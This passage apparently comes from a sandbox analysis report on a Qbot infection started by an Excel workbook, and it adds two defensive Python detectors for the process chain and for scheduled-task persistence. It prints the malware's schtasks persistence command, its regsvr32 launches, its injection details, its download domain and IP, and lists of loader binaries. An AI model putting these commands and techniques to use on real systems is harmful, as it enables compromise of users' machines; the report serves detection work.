          Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdbv source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbN source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942198358.000000000084C000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: setupapi.pdbB source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdbk source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb| source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942187790.0000000000846000.00000004.00000001.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbe source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_1000E5F3 LoadLibraryA,GetProcAddress,
          Source: gihi1.dll.4.dr | Static PE information: section name: .code
          Source: gihi1.dll.4.dr | Static PE information: section name: .rdataf
          Source: gihi2.dll.13.dr | Static PE information: section name: .code
          Source: gihi2.dll.13.dr | Static PE information: section name: .rdataf
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\gihi1.dll
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], ebp
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], ecx
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_010D2A87 push 00000000h; mov dword ptr [esp], eax

          Persistence and Installation Behavior:

          Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\gihi1.dll
          Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\gihi2.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htm
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\gihi1.dll
          Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\gihi2.dll
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002297 StartServiceCtrlDispatcherA,

          Hooking and other Techniques for Hiding and Protection:

          Overwrites code with unconditional jumps - possibly setting hooks in foreign process
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 5800 base: 136F380 value: E9 83 38 D9 FF
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 7024 base: 136F380 value: E9 83 38 2F FF
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to evade analysis by executing a special instruction that causes a usermode exception
Source: C:\Windows\SysWOW64\WerFault.exe Special instruction interceptor: First address: 0000000066AA11EF instructions 0FC7C8 caused by: Known instruction #UD exception (0F C7 C8 is CMPXCHG8B with a register operand, an encoding that is invalid on real hardware and raises #UD; an emulator that decodes it differently gives itself away)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6272 Thread sleep count: 128 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5804 Thread sleep time: -112000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6536 Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 7084 Thread sleep count: 70 > 30
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000BB22 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000EB53 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
(The four Hyper-V strings above are Windows' own error-message text found in the memory of WerFault.exe, the crash reporter started for the two failed regsvr32.exe instances; they are not a virtualization check implemented by the sample.)
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000E5F3 LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_010D1000 push dword ptr fs:[00000030h] (fs:[30h] is the PEB pointer in a 32-bit process)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_01102A6B RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 1130000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 690000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5800 base: 1130000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5800 base: 136F380 value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 7024 base: 690000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 7024 base: 136F380 value: E9
(The first byte written into each newly allocated region, 9C, is PUSHFD; the byte written at 136F380 in both explorer.exe instances, E9, is the opcode of JMP rel32, i.e. existing code in explorer.exe is overwritten with a jump into the injected region, which is what the "Overwrites code with unconditional jumps" signature refers to.)
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 1130000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 136F380
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 690000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 136F380
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
(The injection host is a 32-bit explorer.exe launched from SysWOW64 by regsvr32.exe; the interactive shell is the 64-bit C:\Windows\explorer.exe started by userinit.exe at logon, so this parent/path pairing is itself a detection point.)
Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000B036 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001354E LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000EB53 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
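As an added example (not part of this Joe Sandbox report and not Qbot code), the following Python turns the parent/child relationships in this section and in the behavior graph into a detection check: EXCEL.EXE spawning regsvr32.exe, regsvr32.exe spawning the 32-bit C:\Windows\SysWOW64\explorer.exe that receives the injected code, and that explorer.exe running schtasks.exe. The events are constructed in a Sysmon Event ID 1 style; the PIDs, the command lines and the benign control event are assumptions, only the image paths are taken from the report.

```python
"""Flag the process chain this report shows (EXCEL.EXE -> regsvr32.exe ->
SysWOW64\\explorer.exe -> schtasks.exe) from process-creation events.

Added example, not part of the sandbox report. Events are constructed in a
Sysmon Event ID 1 style; PIDs and command lines are illustrative assumptions.
"""
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOADERS = {"regsvr32.exe", "rundll32.exe"}

# Constructed events (assumption): pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 1000, "ppid": 1,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" plan-1053707320.xlsb'},
    {"pid": 2000, "ppid": 1000,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r"regsvr32 -s C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm"},
    {"pid": 3000, "ppid": 2000,
     "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmd": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 4000, "ppid": 3000,
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'schtasks /create /tn upd /tr "regsvr32.exe -s C:\Users\user\gihi1.dll" /sc once /st 12:00'},
    # Benign control (constructed): the real shell started from C:\Windows.
    {"pid": 5000, "ppid": 2,
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
]


def image_name(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Image names from pid up to the root (or the first unknown parent)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def task_program(cmd):
    """Program named by schtasks /tr, quoted or not; None if absent."""
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def findings(events):
    """Return (pid, reason) pairs for the suspicious links in the chain."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = image_name(parent["image"]) if parent else ""
        if name in LOADERS and pname in OFFICE:
            out.append((e["pid"], "office-spawned-loader"))
            # regsvr32 handed a cached .htm that is really a PE32 (see dropped files).
            if not e["cmd"].split()[-1].lower().endswith(".dll"):
                out.append((e["pid"], "loader-non-dll-argument"))
        if name == "explorer.exe" and "syswow64" in e["image"].lower() and pname in LOADERS:
            out.append((e["pid"], "wow64-explorer-from-loader"))  # injection host
        if name == "schtasks.exe" and OFFICE & set(ancestry(by_pid, e["pid"])):
            out.append((e["pid"], "schtasks-under-office-chain"))
            prog = task_program(e["cmd"])
            if prog and re.search(r"[a-z]:\\users\\", prog, re.IGNORECASE):
                out.append((e["pid"], "task-runs-user-profile-binary"))
    return out


if __name__ == "__main__":
    for pid, reason in findings(EVENTS):
        print(pid, reason)
```

The check walks the full ancestry rather than only the direct parent, so the schtasks.exe call is still attributed to the Office chain even though its immediate parent is explorer.exe, and the benign C:\Windows\explorer.exe event produces no finding.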

Stealing of Sensitive Information:

Yara detected Qbot
Source: Yara match File source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Qbot
Source: Yara match File source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

(Trailing digits after a technique name are the matrix's superscript annotations, kept as they appear; rows 4 to 9 have no Remote Service Effects entry.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 3 | Windows Service 3 | Windows Service 3 | Scripting 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 43 | Scheduled Task/Job 1 | Process Injection 412 | Obfuscated Files or Information 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Scheduled Task/Job 1 | Software Packing 1 | NTDS | System Information Discovery 115 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Service Execution 2 | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Security Software Discovery 111 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 131 | Cached Domain Credentials | Virtualization/Sandbox Evasion 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 412 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Regsvr32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Behavior Graph ID: 440113 | Sample: plan-1053707320.xlsb | Start date: 24/06/2021 | Architecture: WINDOWS | Score: 100

Signatures on the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures

Process tree recovered from the graph (numbers in parentheses are the graph's node numbers; bracketed numbers are the graph's own per-process annotations, which its legend labels as created registry values and created files):

EXCEL.EXE (9) [35 45]
    DNS/IP: gruasphenbogota.com -> 50.116.92.246, port 443, client ports 49739 and 49742, UNIFIEDLAYER-AS-1, US, United States; carpascapital.com
    Dropped: C:\Users\user\AppData\Local\...\ka[1].htm, PE32; C:\Users\user\AppData\Local\...\ka[1].htm, PE32; C:\Users\user\...\~$plan-1053707320.xlsb, data
    Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
    regsvr32.exe (18)
        Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions
        explorer.exe (27) [8 1]
            Dropped: C:\Users\user\gihi1.dll, PE32
            Signatures: Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules
            schtasks.exe (37)
                conhost.exe (39)
    regsvr32.exe (21)
        Signatures: Allocates memory in foreign processes; Maps a DLL or memory area into another process
        explorer.exe (31)
            Dropped: C:\Users\user\gihi2.dll, PE32
regsvr32.exe (14)
    regsvr32.exe (23)
        WerFault.exe (33) [20 9]
            Signatures: Tries to evade analysis by executing a special instruction that causes a usermode exception
regsvr32.exe (16)
    regsvr32.exe (25)
        WerFault.exe (35) [9]
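The schtasks.exe call under explorer.exe (27) and the gihi1.dll dropped into C:\Users\user point at a scheduled task as the persistence mechanism. As an added example, not taken from this report or from Qbot, the Python below audits Task Scheduler XML definitions for that pattern: an Exec action whose command is a script or DLL loader, or whose command or arguments point into a user profile. Both task definitions are constructed (the report does not reproduce the task XML); the element names follow the Task Scheduler schema, and on a live host the same XML is read from C:\Windows\System32\Tasks or exported with Export-ScheduledTask.

```python
"""Audit Task Scheduler XML for the persistence pattern seen in this run:
a loader (regsvr32.exe) registered to run a DLL dropped under C:\\Users.

Added example, not part of the sandbox report. The two task definitions are
constructed; the task name, trigger and vendor path are assumptions.
"""
import re
import xml.etree.ElementTree as ET

# LOLBins that execute code from an arbitrary path on the command line.
LOADERS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_PATH = re.compile(r"[a-z]:\\users\\", re.IGNORECASE)

# Constructed task definition (assumption) mirroring the report's observations.
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2021-06-24T12:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>regsvr32.exe</Command>
      <Arguments>-s "C:\Users\user\gihi1.dll"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign control (assumption): a vendor updater under Program Files.
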